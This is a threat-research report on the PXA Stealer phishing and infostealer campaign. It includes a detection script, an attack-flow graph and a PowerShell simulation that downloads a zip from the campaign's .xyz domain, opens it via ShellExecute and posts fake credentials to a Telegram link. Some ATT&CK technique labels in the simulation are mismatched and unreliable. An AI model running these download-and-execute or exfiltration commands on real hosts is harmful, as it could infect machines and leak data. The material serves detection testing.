31 Mar 2026 16:58

From Phishing to Exfiltration: A Deep Dive into PXA Stealer

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Summary

The report describes a sharp rise in PXA Stealer activity targeting financial organizations in early 2026. Threat actors spread malicious ZIP archives through phishing emails and rely on a multi-stage infection chain that abuses legitimate system tools and a renamed Python interpreter. Once active, the malware steals browser credentials, saved passwords, and cryptocurrency wallet data, then exfiltrates the collected information through Telegram. The campaign highlights how operators have adjusted their tradecraft following earlier disruptions to other infostealer ecosystems.

Investigation

Researchers at CyberProof reconstructed the full attack chain, beginning with a phishing email that delivered a malicious Pumaproject.zip archive and ending with Telegram-based exfiltration. Their analysis identified abuse of Certutil for decoding, a copy of WinRAR disguised as picture.png for extraction, a hidden Dots folder, and a renamed svchost.exe Python interpreter used to launch an obfuscated script tied to a bot identifier. Persistence is maintained through a registry value entry.

Mitigation

Defenders should identify suspicious archive attachments, monitor script execution and known LOLBins from unexpected paths, and block outbound traffic to Telegram as well as unusual TLDs such as .shop and .xyz. Security teams should also harden email gateways and apply strict execution controls to Office files and script-based content.
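The monitoring points above, as an added Python example that is not code from the report or from CyberProof: two check functions run over constructed sample process-creation events and outbound destinations. The paths, command lines and field layout are assumptions chosen to mirror the reported tradecraft (certutil decoding, svchost.exe running outside System32 as the renamed interpreter, the picture.png WinRAR copy, the hidden Dots folder, Telegram and .xyz/.shop destinations); adapt the field extraction to your own EDR or proxy schema.

```python
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TELEGRAM_DOMAINS = ("t.me", "telegram.org", "telegram.me")
WATCHED_TLDS = (".shop", ".xyz")

def check_process(image: str, cmdline: str) -> list:
    """Reasons a process-creation event matches the PXA Stealer chain (empty if none)."""
    img = image.lower()
    name = img.rsplit("\\", 1)[-1]
    hits = []
    # certutil as a LOLBin decoder: the chain decodes a base64 payload hidden in Shodan.pdf
    if name == "certutil.exe" and re.search(r"[-/]decode(hex)?\b", cmdline, re.I):
        hits.append("certutil decode")
    # the real svchost.exe lives only in System32/SysWOW64; elsewhere it is the renamed Python
    if name == "svchost.exe" and not img.startswith(SYSTEM_DIRS):
        hits.append("svchost.exe outside system directory")
    # an image without an executable extension (picture.png = renamed WinRAR) should never run
    if not name.endswith((".exe", ".com", ".scr")):
        hits.append("non-executable extension launched")
    # any process staged under the hidden Dots folder
    if "\\dots\\" in img:
        hits.append("runs from Dots folder")
    return hits

def check_destination(domain: str) -> list:
    """Reasons an outbound destination should be blocked or alerted on."""
    d = domain.lower().rstrip(".")
    hits = []
    if d in TELEGRAM_DOMAINS or d.endswith(tuple("." + t for t in TELEGRAM_DOMAINS)):
        hits.append("telegram")
    if d.endswith(WATCHED_TLDS):
        hits.append("unusual tld")
    return hits

# Constructed sample telemetry mirroring the reported chain (not real logs).
SAMPLE_PROCS = [
    (r"C:\Windows\System32\certutil.exe", "certutil -decode Shodan.pdf out.bin"),
    (r"C:\Users\alice\AppData\Local\Dots\picture.png", "picture.png x archive.rar"),
    (r"C:\Users\alice\AppData\Local\Dots\svchost.exe", "svchost.exe main.py 1234"),
    (r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]
SAMPLE_DOMAINS = ["t.me", "downloadtheproject.xyz", "update.microsoft.com"]

def triage() -> dict:
    """Map each flagged image or domain to its reasons; clean entries are dropped."""
    out = {img: check_process(img, cmd) for img, cmd in SAMPLE_PROCS}
    out.update({d: check_destination(d) for d in SAMPLE_DOMAINS})
    return {k: v for k, v in out.items() if v}
```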

Response

When PXA Stealer is detected, isolate the affected host, capture volatile evidence, and search for the referenced file artifacts and registry modifications. Remove malicious files, terminate affected processes, and reset any exposed credentials. Teams should then perform a wider threat hunt for matching indicators across the environment and notify relevant stakeholders.

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#cccccc
    classDef file fill:#ffeb99
    classDef process fill:#ffcc99
    classDef persistence fill:#c2f0c2
    classDef exfil fill:#f4c2c2
    %% Node definitions
    action_phishing["<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>Description: Email with malicious ZIP (Pumaproject.zip) containing Document.docx.exe."]
    class action_phishing action
    file_zip["<b>File</b> – Pumaproject.zip<br/><b>Contains</b>: Document.docx.exe"]
    class file_zip file
    action_user_exec["<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Description: Victim opens the attached executable."]
    class action_user_exec action
    process_malicious_exe["<b>Process</b> – Document.docx.exe"]
    class process_malicious_exe process
    action_execution_hijack["<b>Action</b> – <b>T1574 Hijack Execution Flow</b><br/>Description: Launches inter.cmd and uses certutil to decode payload from Shodan.pdf."]
    class action_execution_hijack action
    process_inter_cmd["<b>Process</b> – inter.cmd"]
    class process_inter_cmd process
    tool_certutil["<b>Tool</b> – certutil.exe<br/><b>Purpose</b>: Decode base64 content"]
    class tool_certutil tool
    file_shodan_pdf["<b>File</b> – Shodan.pdf<br/><b>Contains</b>: Base64 encoded payload"]
    class file_shodan_pdf file
    action_defense_embedded["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>Description: Payload hidden inside PDF file."]
    class action_defense_embedded action
    action_decode["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Description: certutil decodes the payload."]
    class action_decode action
    action_hidden_dir["<b>Action</b> – <b>T1564.001 Hidden Files and Directories</b><br/>Description: Malware creates hidden folder 'Dots' for intermediate files."]
    class action_hidden_dir action
    file_hidden_dir["<b>File</b> – Dots (hidden directory)"]
    class file_hidden_dir file
    action_relocate["<b>Action</b> – <b>T1070.010 Indicator Removal: Relocate Malware</b><br/>Description: Moves malicious files into hidden 'Dots' directory."]
    class action_relocate action
    action_compression["<b>Action</b> – <b>T1027.015 Compression</b><br/>Description: WinRAR disguised as picture.png extracts password-protected archive (password shodan2201)."]
    class action_compression action
    tool_winar["<b>Tool</b> – WinRAR (renamed picture.png)"]
    class tool_winar tool
    file_archive["<b>File</b> – Password protected archive (shodan2201)"]
    class file_archive file
    action_rc_script["<b>Action</b> – <b>T1037.004 RC Scripts</b><br/>Description: Portable Python dropped, renamed to svchost.exe and executed with $BOT_ID argument."]
    class action_rc_script action
    process_svc_host["<b>Process</b> – svchost.exe (malicious Python interpreter)"]
    class process_svc_host process
    action_active_setup["<b>Action</b> – <b>T1547.014 Active Setup</b><br/>Description: Registry entry added to run svchost.exe at startup."]
    class action_active_setup action
    action_com_hijack["<b>Action</b> – <b>T1546.015 COM Hijacking</b><br/>Description: COM hijacking registry entry created for automatic execution."]
    class action_com_hijack action
    action_cred_browser["<b>Action</b> – <b>T1555.003 Credentials from Web Browsers</b><br/>Description: Injects into browsers to steal passwords, cookies, crypto wallet data."]
    class action_cred_browser action
    action_cred_cookies["<b>Action</b> – <b>T1539 Steal Web Session Cookie</b><br/>Description: Extracts web session cookies for reuse."]
    class action_cred_cookies action
    action_keylogging["<b>Action</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Description: Captures keystrokes from the user."]
    class action_keylogging action
    action_exfil_telegram["<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>Description: Sends collected data to attacker-controlled Telegram channels."]
    class action_exfil_telegram exfil
    action_exfil_c2["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Description: Uses Telegram as C2 and exfiltration channel."]
    class action_exfil_c2 exfil
    %% Connections
    action_phishing -->|delivers| file_zip
    file_zip -->|executes| action_user_exec
    action_user_exec -->|runs| process_malicious_exe
    process_malicious_exe -->|launches| action_execution_hijack
    action_execution_hijack -->|spawns| process_inter_cmd
    process_inter_cmd -->|uses| tool_certutil
    tool_certutil -->|decodes| file_shodan_pdf
    file_shodan_pdf -->|contains| action_defense_embedded
    action_defense_embedded -->|triggers| action_decode
    action_decode -->|creates| action_hidden_dir
    action_hidden_dir -->|creates| file_hidden_dir
    action_hidden_dir -->|stores| action_relocate
    action_relocate -->|moves files to| file_hidden_dir
    action_relocate -->|leads to| action_compression
    action_compression -->|uses| tool_winar
    tool_winar -->|extracts| file_archive
    file_archive -->|provides| action_rc_script
    action_rc_script -->|executes| process_svc_host
    process_svc_host -->|establishes| action_active_setup
    process_svc_host -->|establishes| action_com_hijack
    process_svc_host -->|enables| action_cred_browser
    process_svc_host -->|enables| action_cred_cookies
    process_svc_host -->|enables| action_keylogging
    action_keylogging -->|feeds data to| action_exfil_telegram
    action_cred_browser -->|feeds data to| action_exfil_telegram
    action_cred_cookies -->|feeds data to| action_exfil_telegram
    action_exfil_telegram -->|uses channel| action_exfil_c2

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The threat actor deploys the PXA Stealer on a compromised Windows host. After the user unwittingly executes the initial malicious binary (T1204.002), the stealer runs a PowerShell snippet that:

    1. Downloads a malicious ZIP from the hard-coded domain downloadtheproject.xyz (T1202 – indirect command execution).
    2. Exfiltrates the harvested data by posting a message to a Telegram channel via t.me (T1559.002 – phishing link).
    3. Optionally loads a malicious COM component to achieve persistence (T1127.002).

    Both outbound HTTP GET requests generate the DestinationDomain fields that the Sigma rule watches, causing an alert.

  • Regression Test Script:

    # PXA Stealer simulation – triggers the detection rule
    # Join-Path is used because "$env:TEMPpayload.zip" would be parsed as the single
    # (undefined) variable $env:TEMPpayload and expand to just ".zip".
    $tmpZip = Join-Path $env:TEMP 'payload.zip'
    $tmpMsg = Join-Path $env:TEMP 'steal.txt'
    
    # 1. Download malicious ZIP from the first malicious domain.
    #    The outbound request itself is the telemetry; a failed download must not abort the test.
    try {
        Invoke-WebRequest -Uri "https://downloadtheproject.xyz/malware.zip" -OutFile $tmpZip -UseBasicParsing
    } catch {
        Write-Warning "Download attempt failed (expected if the domain is down or sinkholed): $_"
    }
    
    # 2. Simulate data exfiltration via Telegram link
    $payload = "User credentials: admin / Pass123!"
    Set-Content -Path $tmpMsg -Value $payload -Encoding ASCII
    try {
        Invoke-WebRequest -Uri "https://t.me/stealchannel?text=$([uri]::EscapeDataString($payload))" -UseBasicParsing | Out-Null
    } catch {
        Write-Warning "Telegram request failed: $_"
    }
    
    # 3. (Optional) Load a dummy COM object to emulate T1127.002
    try {
        $com = New-Object -ComObject "Shell.Application"
        $com.ShellExecute($tmpZip, "", "", "open", 0) | Out-Null
    } catch {
        # Ignore errors – this is only for telemetry
    }

  • Cleanup Commands:

    # Remove artifacts created by the simulation
    # Paths are re-derived so the cleanup also works in a fresh session
    $tmpZip = Join-Path $env:TEMP 'payload.zip'
    $tmpMsg = Join-Path $env:TEMP 'steal.txt'
    Remove-Item -Path $tmpZip -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $tmpMsg -Force -ErrorAction SilentlyContinue